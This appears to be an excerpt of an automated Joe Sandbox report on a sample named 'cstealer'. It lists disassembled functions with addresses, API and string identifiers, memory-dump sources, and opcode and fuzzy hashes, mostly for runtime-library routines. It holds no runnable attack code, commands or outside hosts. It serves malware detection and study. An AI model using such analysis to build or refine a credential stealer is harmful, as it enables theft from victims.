                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                            • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction ID: a9103afe176f52cbe78642f2056b20853b8e02445d4f0fec172ea73681d362ef
                                                                                                                                                            • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction Fuzzy Hash: 5331667262979191E730DB20E4515EAA3A4FF84BC4F404176E68D96AA9DF3CDB09CB40
                                                                                                                                                            Function 00000271DC671A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction ID: 522e71180f65c9dca4a0cd9855eca99b926e46b1579d6b756a01c457d0a65163
                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction Fuzzy Hash: 84F031B230964196EB708FA9E98875A6760FF48B88FD44421DB4D46B94DB3CC65DCF00
                                                                                                                                                            Function 00007FF6957FA83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction ID: c45e75ad2a6c0e8528d3e46f2eddc9b3752a03e735f3178137c1fe1a5ee646ba
                                                                                                                                                            • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction Fuzzy Hash: 5CF0F621B0AA0281FF348F24E44877963A0FF49F60F540276DA6E892F0CF2CE949C300
                                                                                                                                                            Function 00000271DC67BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 3fde1b4acaf1c2a7621f6aadb595f1a0520da6d3fe647dd13f331d96860d9654
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: C7F062B121A70489EF308FACE44C35A6360EF84765F940A19DB6E457E4DF2CC5648F40
                                                                                                                                                            Function 00000271DC673044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: 385cd6917ef0efa851a74bdb6abc75743dac0bf1ef5c84b8943756caa081a227
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 79F082B430DB8086EA208FDBB90C11A6260AF48FC0F445930EF4E07B98DF3CC4658B00
                                                                                                                                                            Function 00000271DC675710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction ID: 92d5dd4e415f69041205096e8f11b788bf74372da79bb5bae543fcfe5fde79cf
                                                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction Fuzzy Hash: 8B61AC3651EB84CAEA70CF99E44835AB7A0F788794F100955EA8D47FA8EB7CC561CF04
                                                                                                                                                            Function 00007FF69580A420 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction ID: 9786c896effd60b735d74fef3d11193670847d29339bb0b6f525b0c2330a6263
                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction Fuzzy Hash: F011942AE1DE2323F6F41174E75A3F925C1EF65B70E1446B7E56E862D78E2C6C404304
                                                                                                                                                            Function 00000271DC684104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: f892ab0a3f87b1ab50160ce5fee09d79b182faa922a6a9fc94291013d711edb4
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: B31191F2A5EA5019F6741DECD47D3771150EF6C3B8F480E24AABE06BD68A2CC8616A00
                                                                                                                                                            Function 00000271DC653504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: f4e2aff9ad020056e269964b82bac72321d6cb0e62f62776a5e1dae4aa9a1f90
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 4311A332A7EA1119FA741DECE44D37911816F78F74F789E38A96E063DECA24E8614A00
                                                                                                                                                            Function 00007FF6957FC140 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC15F
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC17E
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1B7
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957FB35B,?,?,00000000,00007FF6957FB5F6,?,?,?,?,?,00007FF6957F38BC), ref: 00007FF6957FC1C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 0edf6ad027cd4432b184a000666696f4467c11918a062e73d65072d1230534f5
                                                                                                                                                            • Instruction ID: dc4b722bc52709e1bc4aecd89f506977ac2d892b39b68c1d27883f250831bb96
                                                                                                                                                            • Opcode Fuzzy Hash: 0edf6ad027cd4432b184a000666696f4467c11918a062e73d65072d1230534f5
                                                                                                                                                            • Instruction Fuzzy Hash: A4116D60B1C61202FA79E325AA5117921D5DF44BF0F2847B5EC3ECA6C6DE2CBE11A700
                                                                                                                                                            Function 00007FF6957FBFD4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 33c1781fd03adb740af2f2b373a1a36dcaefa8e0d61b13fcb7fb9143c19327a2
                                                                                                                                                            • Instruction ID: d9483017caa7d85085374a49a42960857f51b6414bd97ef920442b701cc62d03
                                                                                                                                                            • Opcode Fuzzy Hash: 33c1781fd03adb740af2f2b373a1a36dcaefa8e0d61b13fcb7fb9143c19327a2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D112A10A0C21742F979E23599621B912D5CF45FB4F280BB5DD3ECE2D6DD2CBE026B10
                                                                                                                                                            Function 00007FF6957F69F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: verbose
                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                            • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction ID: 88d8e4b45fd039e3096e8efb775401b19cb08c8f48ff6850ecba594dd68a0835
                                                                                                                                                            • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction Fuzzy Hash: 6791AD22A08A4681EB71DE25E45037D36E1EB40F98F5482B6DE998B3D5DE3CEE45E340
                                                                                                                                                            Function 00007FF695800AA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                            • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction ID: d0337d5da640b3d9def16a9e3fd056f7cfe23644de364702abb18c924dd4e477
                                                                                                                                                            • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction Fuzzy Hash: 74819036E2E662C5F6759E3983502B836E0EB11F58F9580B2CA0ED7295DF3DED029701
                                                                                                                                                            Function 00000271DC64F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction ID: 99f73300f3124eb834200c5e2f46cb8cfac03b0349b3888afeff7452da31a641
                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction Fuzzy Hash: 8361A23660E6408EFA759FFCD55C76ABBA2EF85740F504C15EA0E137A4DA34C862CB02
                                                                                                                                                            Function 00007FF6957ECF80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                            • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction ID: cc76a6ffb39560f271f8ea75e1767ec1e135caf5698325d547b6ee888e820763
                                                                                                                                                            • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction Fuzzy Hash: C351C132B197028ADB24CB15E8446B833D1EB44F98F458179DA5A8B7A8EF7DEE45C700
                                                                                                                                                            Function 00000271DC67AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: aa76c5c0766c28952d6f1093734573f43353b3502fa2311d607271cd26df7e9a
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: 22617F7360AB448AEF20DFA9D44439D77A0FB44B88F245A15EF4D17B99EB38C5A5CB00
                                                                                                                                                            Function 00007FF6957EF800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction ID: e912ed732ba4e1000e8ccf8d13ef225e1c27467ca302b712368b27028fa9ea42
                                                                                                                                                            • Opcode Fuzzy Hash: 93010d95ed42164ec617659bf15c462d53d81a38e330ec23f798dc78275aa1b2
                                                                                                                                                            • Instruction Fuzzy Hash: 04618132908B8581E7309F15E4417FAB7A0FB85B94F044665EB9D8BB65DF3CD698CB00
                                                                                                                                                            Function 00007FF6957EFBB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction ID: 020a7803e52e5e532ef3192673f14750480baa9a95b75d2cd684a07a4d1f1f93
                                                                                                                                                            • Opcode Fuzzy Hash: 7fe73a2a5521307b3718a11731218a5d657cd704d90c9c291f237acf2a87c54e
                                                                                                                                                            • Instruction Fuzzy Hash: 1251AE3290879286EB748F1594542B87BE0FB44F84F144576DE8D8BBE5CF3CEA698701
                                                                                                                                                            Function 00000271DC67AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: df7b01f0a770963dc40320c84327e51dea3fbfe67687df7a8ca2ee8bde445190
